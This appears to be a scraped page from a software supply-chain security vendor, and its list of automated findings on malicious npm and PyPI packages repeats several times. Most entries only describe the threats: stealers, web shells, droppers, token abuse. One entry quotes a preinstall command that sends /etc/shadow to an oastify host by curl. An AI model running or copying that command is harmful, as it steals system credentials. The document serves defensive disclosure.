Secure your dependencies. Ship with confidence.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

[Skill Scanner] Natural language instruction to download and install from URL detected No direct malicious code or explicit backdoor indicators are present in the provided documentation fragment. The dominant security concerns are: (1) credential exposure risk from advising users to inline FIRECRAWL_API_KEY into shell commands, (2) privacy/third-party data exposure because page contents and credentials are sent to the Firecrawl service, and (3) general supply-chain risk of executing a local pipeline.py without verification. Recommended mitigations: avoid inlining secrets, inspect and verify pipeline.py before executing, restrict crawl scope to public pages, and prefer local crawling if privacy is required. For a definitive malware determination, review the actual pipeline.py implementation and any network endpoints it contacts. LLM verification: No explicit malicious code is present in this documentation fragment, but there are multiple supply-chain and operational security risks: (1) instructing users to place API keys inline on the command line (credential exposure), (2) recommending unpinned pip installs (package supply-chain risk), and (3) requiring execution of an unreviewed local script (scripts/pipeline.py) which could perform arbitrary actions. Recommend: do not run the pipeline.py until you review its source; avoid embedding AP

This module itself contains no obvious hidden backdoor or obfuscated malicious payload, but it intentionally executes external Python files found under multiple search paths (including user-writable locations like the current working directory and user home). That design introduces a high-risk supply-chain/plugin execution vector: untrusted plugin files named <domain>.py or package directories can run arbitrary code via exec_module and class instantiation. Recommend treating plugins from those paths as untrusted, restricting or validating plugin locations, using cryptographic signing or checksum verification, or executing plugins in an isolated process. Do not place sensitive credentials or run as privileged user when plugin discovery paths include writable directories.

Live on pypi for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

The fragment exfiltrates local system information to an external domain without explicit user consent or clear documentation within the snippet. While it uses HTTPS for transport, the lack of consent, visibility, and controls constitutes a privacy and supply-chain concern. The code could be legitimate telemetry in some deployments, but as-is it presents a potential data leakage risk and warrants further provenance checks and disclosure.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk supply-chain abuse tool. It programmatically uses npm tokens from environment variables to enumerate package names owned by the token holders, temporarily alters local package metadata and README, and runs npm publish with the token to publish the repository contents as versions of those packages. It is likely intended to be used to mass-publish or backdoor packages when executed in environments with exposed tokens (e.g., CI). Treat presence of this script as malicious or highly dangerous: remove it, rotate any exposed tokens, audit CI environments for inadvertent exposure, and inspect any unexpected package versions published from your accounts.

Live on npm for 4 days, 3 hours and 9 minutes before removal. Socket users were protected even while the package was live.

The model file is a standard UNet-like tf.keras model except it includes a Lambda layer with an embedded serialized Python function (opaque bytes). This pattern allows arbitrary code execution in the host Python process during model load or inference and therefore constitutes a high-risk supply-chain/deserialization threat. Treat the artifact as untrusted until the Lambda's payload is safely decoded and audited or the Lambda is removed/replaced with graph-native preprocessing.

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

This module is primarily a client-side PDF annotator/exporter, but it also performs high-risk remote behavior: it embeds object storage credentials directly in the client and uploads user-selected non-PDF content to external infrastructure, then calls a hardcoded external HTTP backend to process and return content. This creates a clear data-exfiltration/remote-processing supply-chain risk. There is no clear evidence of classic execution-based malware in the excerpt, but the credential exposure + fixed egress endpoints make the security posture unacceptable without remediation (remove embedded secrets, move uploads/processing to a trusted backend with proper auth, use HTTPS, and make endpoints configurable/auditable).

The code is malicious and poses a serious security risk. It performs unauthorized collection of extensive system and user environment information and stealthily exfiltrates this data to a hardcoded remote server. This is a clear supply chain security incident involving data theft. The obfuscation and silent error handling reinforce the intent to evade detection. Immediate removal and blocking of this package is strongly recommended.

Live on npm for 9 days, 11 hours and 44 minutes before removal. Socket users were protected even while the package was live.

This dependency/module exposes multiple high-impact host-control primitives: arbitrary command execution (unvalidated interpolation), clipboard read/write (including direct clipboard exfiltration to the caller), and writing attacker-influenced base64 content to a filesystem path influenced by remote filename plus cwd. It also forwards bearer tokens to external services. While the code is not visibly obfuscated, the capability set is sufficiently dangerous that the module should be treated as security-critical and requires strict access control, input validation, and path hardening around tool invocation and remote filename handling.

This setup script packages and installs a program explicitly designed as 'SpyWare'. It contains multiple high-risk behaviors: running shell commands at install time (including sudo apt-get), invoking pip to install a wheel by constructed filename, registering a console script that will execute spying code, and linking to prebuilt binaries. The file strongly indicates intentional malicious functionality (keylogging, screenshotting, webcam/audio capture, clipboard and file monitoring). Do not install or run this package. Further inspection of the package's runtime modules and any distributed binaries is required to enumerate full capabilities and exfiltration channels.

This module is a deliberate destructive utility that corrupts all .zip files in a specified directory by truncating each archive to half its size and appending repeated junk data. While it lacks common malware features like networking or data exfiltration, the behavior is strongly indicative of sabotage and would be unacceptable in most software supply-chain contexts due to its potential to break builds, deployments, or artifact integrity.

This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary to determine its exact behavior.

Live on npm for 42 minutes before removal. Socket users were protected even while the package was live.

This module collects host- and user-identifying data (including package name/version, hostname, username, home directory, DNS servers and output of 'uname -a') and transmits it to a hardcoded external domain via an HTTPS GET and a DNS lookup. There is no user consent or configuration. This behavior constitutes data exfiltration and is malicious or at least highly suspicious for a production dependency. Recommend removing or isolating the package, blocking network access to the domain, and investigating how this code was introduced.

Live on npm for 19 hours and 33 minutes before removal. Socket users were protected even while the package was live.

This Python 2 script is an interactive controller meant to send arbitrary shell commands to a web-based backdoor endpoint specified by the user. Though it contains coding errors that prevent execution as-is, its intent is clearly malicious (remote command execution/C2 controller). Treat it as malware/abuse tooling: do not run it against systems you do not own or administer. Remove from trusted supply chains and investigate related artifacts if found in a project.

This PHP file is a malicious web shell/backdoor (NetworkFileManagerPHP) designed for unauthorized access and abuse. It enables remote command execution (via system/exec and a command box), arbitrary file read/write/upload, remote binary download and execution (bind shell), credential harvesting, FTP bruteforcing, mass emailing/spamming, and database dumping. It also automatically exfiltrates server/environment information to hardcoded external email addresses. This is active malware/backdoor code and should not be deployed; any server containing it should be considered compromised and undergo incident response.

Severe security vulnerability: the module eval()s the 'stop' field of a remote JSON response, enabling arbitrary remote code execution. This constitutes a backdoor/supply-chain risk if the configured URL or response can be controlled. Additional quality issues (undefined return variable, lack of error handling, unused string) exist. Do not use this code as-is — replace eval with safe parsing/validation, secure the remote endpoint (authentication, integrity checks), and fix the bug and error handling.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

The script attempts to send sensitive system information to an external server, which poses a significant security risk and is indicative of malicious intent.

Live on npm for 4 hours and 39 minutes before removal. Socket users were protected even while the package was live.

This module contains a deliberate malicious/unwanted payload: a locale-and-host targeted routine that disables user interaction and injects/plays an externally hosted audio file (https://flag-gimn.ru/...). This behavior is not legitimate for an annotation/UI library and should be considered malicious backdoor/tampering. Remove that conditional block immediately and audit repository history/maintainers for supply-chain compromise. The remainder of the code appears to implement expected UI/annotation functionality (hotkeys, canvas rendering, network mutate calls) but should be audited in context; network mutations are legitimate sinks for user data and should be validated (endpoints, auth). Treat the package as compromised until provenance is verified.

This module is an explicit, purpose-built Instagram cookie/session token extractor. It scans multiple browser profile cookie databases, copies them to temporary storage, filters for Instagram authentication cookies, and decrypts protected cookie values using OS credential/crypto mechanisms (Windows DPAPI via PowerShell, macOS keychain via `security` CLI, and Linux with deterministic derived-key decryption). It then returns plaintext session-critical cookies to the caller, which would enable account/session hijacking. No network exfiltration is shown in this code fragment, but the capability to harvest and recover usable authentication material is strongly malicious/high-risk.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

[Skill Scanner] Natural language instruction to download and install from URL detected No direct malicious code or explicit backdoor indicators are present in the provided documentation fragment. The dominant security concerns are: (1) credential exposure risk from advising users to inline FIRECRAWL_API_KEY into shell commands, (2) privacy/third-party data exposure because page contents and credentials are sent to the Firecrawl service, and (3) general supply-chain risk of executing a local pipeline.py without verification. Recommended mitigations: avoid inlining secrets, inspect and verify pipeline.py before executing, restrict crawl scope to public pages, and prefer local crawling if privacy is required. For a definitive malware determination, review the actual pipeline.py implementation and any network endpoints it contacts. LLM verification: No explicit malicious code is present in this documentation fragment, but there are multiple supply-chain and operational security risks: (1) instructing users to place API keys inline on the command line (credential exposure), (2) recommending unpinned pip installs (package supply-chain risk), and (3) requiring execution of an unreviewed local script (scripts/pipeline.py) which could perform arbitrary actions. Recommend: do not run the pipeline.py until you review its source; avoid embedding AP

This module itself contains no obvious hidden backdoor or obfuscated malicious payload, but it intentionally executes external Python files found under multiple search paths (including user-writable locations like the current working directory and user home). That design introduces a high-risk supply-chain/plugin execution vector: untrusted plugin files named <domain>.py or package directories can run arbitrary code via exec_module and class instantiation. Recommend treating plugins from those paths as untrusted, restricting or validating plugin locations, using cryptographic signing or checksum verification, or executing plugins in an isolated process. Do not place sensitive credentials or run as privileged user when plugin discovery paths include writable directories.

Live on pypi for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

The fragment exfiltrates local system information to an external domain without explicit user consent or clear documentation within the snippet. While it uses HTTPS for transport, the lack of consent, visibility, and controls constitutes a privacy and supply-chain concern. The code could be legitimate telemetry in some deployments, but as-is it presents a potential data leakage risk and warrants further provenance checks and disclosure.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

This script is a high-risk supply-chain abuse tool. It programmatically uses npm tokens from environment variables to enumerate package names owned by the token holders, temporarily alters local package metadata and README, and runs npm publish with the token to publish the repository contents as versions of those packages. It is likely intended to be used to mass-publish or backdoor packages when executed in environments with exposed tokens (e.g., CI). Treat presence of this script as malicious or highly dangerous: remove it, rotate any exposed tokens, audit CI environments for inadvertent exposure, and inspect any unexpected package versions published from your accounts.

Live on npm for 4 days, 3 hours and 9 minutes before removal. Socket users were protected even while the package was live.

The model file is a standard UNet-like tf.keras model except it includes a Lambda layer with an embedded serialized Python function (opaque bytes). This pattern allows arbitrary code execution in the host Python process during model load or inference and therefore constitutes a high-risk supply-chain/deserialization threat. Treat the artifact as untrusted until the Lambda's payload is safely decoded and audited or the Lambda is removed/replaced with graph-native preprocessing.

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

This module is primarily a client-side PDF annotator/exporter, but it also performs high-risk remote behavior: it embeds object storage credentials directly in the client and uploads user-selected non-PDF content to external infrastructure, then calls a hardcoded external HTTP backend to process and return content. This creates a clear data-exfiltration/remote-processing supply-chain risk. There is no clear evidence of classic execution-based malware in the excerpt, but the credential exposure + fixed egress endpoints make the security posture unacceptable without remediation (remove embedded secrets, move uploads/processing to a trusted backend with proper auth, use HTTPS, and make endpoints configurable/auditable).

The code is malicious and poses a serious security risk. It performs unauthorized collection of extensive system and user environment information and stealthily exfiltrates this data to a hardcoded remote server. This is a clear supply chain security incident involving data theft. The obfuscation and silent error handling reinforce the intent to evade detection. Immediate removal and blocking of this package is strongly recommended.

Live on npm for 9 days, 11 hours and 44 minutes before removal. Socket users were protected even while the package was live.

This dependency/module exposes multiple high-impact host-control primitives: arbitrary command execution (unvalidated interpolation), clipboard read/write (including direct clipboard exfiltration to the caller), and writing attacker-influenced base64 content to a filesystem path influenced by remote filename plus cwd. It also forwards bearer tokens to external services. While the code is not visibly obfuscated, the capability set is sufficiently dangerous that the module should be treated as security-critical and requires strict access control, input validation, and path hardening around tool invocation and remote filename handling.

This setup script packages and installs a program explicitly designed as 'SpyWare'. It contains multiple high-risk behaviors: running shell commands at install time (including sudo apt-get), invoking pip to install a wheel by constructed filename, registering a console script that will execute spying code, and linking to prebuilt binaries. The file strongly indicates intentional malicious functionality (keylogging, screenshotting, webcam/audio capture, clipboard and file monitoring). Do not install or run this package. Further inspection of the package's runtime modules and any distributed binaries is required to enumerate full capabilities and exfiltration channels.

This module is a deliberate destructive utility that corrupts all .zip files in a specified directory by truncating each archive to half its size and appending repeated junk data. While it lacks common malware features like networking or data exfiltration, the behavior is strongly indicative of sabotage and would be unacceptable in most software supply-chain contexts due to its potential to break builds, deployments, or artifact integrity.

This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary to determine its exact behavior.

Live on npm for 42 minutes before removal. Socket users were protected even while the package was live.

This module collects host- and user-identifying data (including package name/version, hostname, username, home directory, DNS servers and output of 'uname -a') and transmits it to a hardcoded external domain via an HTTPS GET and a DNS lookup. There is no user consent or configuration. This behavior constitutes data exfiltration and is malicious or at least highly suspicious for a production dependency. Recommend removing or isolating the package, blocking network access to the domain, and investigating how this code was introduced.

Live on npm for 19 hours and 33 minutes before removal. Socket users were protected even while the package was live.

This Python 2 script is an interactive controller meant to send arbitrary shell commands to a web-based backdoor endpoint specified by the user. Though it contains coding errors that prevent execution as-is, its intent is clearly malicious (remote command execution/C2 controller). Treat it as malware/abuse tooling: do not run it against systems you do not own or administer. Remove from trusted supply chains and investigate related artifacts if found in a project.

This PHP file is a malicious web shell/backdoor (NetworkFileManagerPHP) designed for unauthorized access and abuse. It enables remote command execution (via system/exec and a command box), arbitrary file read/write/upload, remote binary download and execution (bind shell), credential harvesting, FTP bruteforcing, mass emailing/spamming, and database dumping. It also automatically exfiltrates server/environment information to hardcoded external email addresses. This is active malware/backdoor code and should not be deployed; any server containing it should be considered compromised and undergo incident response.

Severe security vulnerability: the module eval()s the 'stop' field of a remote JSON response, enabling arbitrary remote code execution. This constitutes a backdoor/supply-chain risk if the configured URL or response can be controlled. Additional quality issues (undefined return variable, lack of error handling, unused string) exist. Do not use this code as-is — replace eval with safe parsing/validation, secure the remote endpoint (authentication, integrity checks), and fix the bug and error handling.

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

The script attempts to send sensitive system information to an external server, which poses a significant security risk and is indicative of malicious intent.

Live on npm for 4 hours and 39 minutes before removal. Socket users were protected even while the package was live.

This module contains a deliberate malicious/unwanted payload: a locale-and-host targeted routine that disables user interaction and injects/plays an externally hosted audio file (https://flag-gimn.ru/...). This behavior is not legitimate for an annotation/UI library and should be considered malicious backdoor/tampering. Remove that conditional block immediately and audit repository history/maintainers for supply-chain compromise. The remainder of the code appears to implement expected UI/annotation functionality (hotkeys, canvas rendering, network mutate calls) but should be audited in context; network mutations are legitimate sinks for user data and should be validated (endpoints, auth). Treat the package as compromised until provenance is verified.

This module is an explicit, purpose-built Instagram cookie/session token extractor. It scans multiple browser profile cookie databases, copies them to temporary storage, filters for Instagram authentication cookies, and decrypts protected cookie values using OS credential/crypto mechanisms (Windows DPAPI via PowerShell, macOS keychain via `security` CLI, and Linux with deterministic derived-key decryption). It then returns plaintext session-critical cookies to the caller, which would enable account/session hijacking. No network exfiltration is shown in this code fragment, but the capability to harvest and recover usable authentication material is strongly malicious/high-risk.